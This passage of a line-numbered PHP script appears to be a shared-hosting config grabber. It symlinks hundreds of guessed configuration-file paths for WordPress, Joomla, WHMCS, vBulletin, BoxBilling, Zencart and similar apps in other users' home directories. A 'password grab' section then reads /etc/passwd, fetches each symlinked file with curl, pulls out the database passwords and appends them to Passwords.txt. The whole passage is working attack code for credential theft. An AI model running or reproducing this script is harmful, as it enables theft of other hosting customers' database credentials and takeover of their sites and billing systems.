  1365. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1366. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1367. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1368. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1369. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1370. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1389. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1390. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1391. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1392. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1393. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1394. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1395. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1396. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1397. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1398. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1399. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1400. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1401. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1402. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1403. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1404. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1405. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1406. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1407. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1408. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1409. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1410. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1411. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1412. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1413. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1414. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1415. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1416. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1417. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1418. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1419. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1420. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1421. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1422. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1423. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1424. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1425. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1426. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1427. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1428. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1429. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1430. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1431. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1432. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1433. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1434. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1435. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1436. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1437. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1438. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1439. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1440. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1441. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1442. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1443. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1444. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1445. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1446. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1447. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1448. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1449. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1450.  
  1451. //Home4
  1452.  
  1453. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1454. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1455. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1456. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1457. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1458. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1459. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1460. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1461. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1462. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1463. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1464. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1465. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1466. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1467. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1468. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1469. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1470. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1471. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1472. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1473. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1474. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1475. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1476. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1477. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1478. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1479. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1480. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1481. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1482. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1483. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1484. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1485. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1486. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1487. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1488. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1489. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1490. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1491. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1492. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1493. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1494. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1495. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1496. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1497. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1498. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1499. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1500. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1501. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1502. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1503. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1504. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1505. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1506. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1507. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1508. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1509. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1510. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1511. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1512. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1513. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1514. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1515. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1516. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1517. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1518. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1519. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1520. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1521. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1522. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1523. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1524. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1525. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1526. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1527. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1528. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1529. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1530. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1531. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1532. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1533. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1534. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1535. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1536. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1537. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1538. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1539. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1540. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1541. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1542. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1543. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1544. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1545. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1546. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1547. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1548. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1549. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1550. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1551. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1552. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1553. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1572. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1573. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1574. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1575. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1576. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1577. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1578. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1579. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1580. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1581. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1582. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1583. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1584. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1585. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1586. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1587. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1588. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1589. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1590. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1591. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1592. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1593. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1594. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1595. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1596. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1597. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1598. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1599. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1600. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1601. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1602. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1603. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1604. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1605. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1606. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1607. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1608. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1609. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1610. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1611. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1612. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1613. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1614. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1615. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1616. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1617. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1618. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1619. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1620. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1621. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1622. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1623. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1624. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1625. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1626. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1627. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1628. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1629. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1630. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1631. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1632. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1633.  
  1634. }
  1635.  
  1636. //password grab
  1637.  
  1638. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  1639. {
  1640.  
  1641. $ar0=explode($marqueurDebutLien, $text);
  1642. $ar1=explode($marqueurFinLien, $ar0[1]);
  1643. $ar=trim($ar1[0]);
  1644. return $ar;
  1645. }
  1646.  
  1647. $ffile=fopen('Passwords.txt','a+');
  1648.  
  1649.  
  1650. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/mct_symconf/";
  1651. $re=$r;
  1652. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  1653.  
  1654. $users=file("/etc/passwd");
  1655. foreach($users as $user)
  1656. {
  1657.  
  1658. $str=explode(":",$user);
  1659. $usersss=$str[0];
  1660. foreach($confi as $co)
  1661. {
  1662.  
  1663.  
  1664. $uurl=$re.$usersss.$co;
  1665. $uel=$uurl;
  1666.  
  1667. $ch = curl_init();
  1668.  
  1669. curl_setopt($ch, CURLOPT_URL, $uel);
  1670. curl_setopt($ch, CURLOPT_HEADER, 1);
  1671. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1672. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1673. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  1674. $result['EXE'] = curl_exec($ch);
  1675. curl_close($ch);
  1676. $uxl=$result['EXE'];
  1677.  
  1678.  
  1679. if($uxl && preg_match('/table_prefix/i',$uxl))
  1680. {
  1681.  
  1682. //Wordpress
  1683.  
  1684. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  1685. if(!empty($dbp))
  1686. $pass=$dbp."\n";
  1687. fwrite($ffile,$pass);
  1688.  
  1689. }
  1690. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  1691. {
  1692.  
  1693. //WHMCS
  1694.  
  1695. $dbp=entre2v2($uxl,"db_password = '","';");
  1696. if(!empty($dbp))
  1697. $pass=$dbp."\n";
  1698. fwrite($ffile,$pass);
  1699.  
  1700. }
  1701.  
  1702.  
  1703. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  1704. {
  1705.  
  1706. //Joomla
  1707.  
  1708. $db=entre2v2($uxl,"password = '","';");
  1709. if(!empty($db))
  1710. $pass=$db."\n";
  1711. fwrite($ffile,$pass);
  1712. }
  1713. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  1714. {
  1715.  
  1716. //Vbulletin
  1717.  
  1718. $db=entre2v2($uxl,"password'] = '","';");
  1719. if(!empty($db))
  1720. $pass=$db."\n";
  1721. fwrite($ffile,$pass);
  1722.  
  1723. }
  1724. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  1725. {
  1726.  
  1727. //Other
  1728.  
  1729. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  1730. if(!empty($db))
  1731. $pass=$db."\n";
  1732. fwrite($ffile,$pass);
  1733. }
  1734. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1735. {
  1736.  
  1737. //Other
  1738.  
  1739. $db=entre2v2($uxl,"dbpass = '","';");
  1740. if(!empty($db))
  1741. $pass=$db."\n";
  1742. fwrite($ffile,$pass);
  1743. }
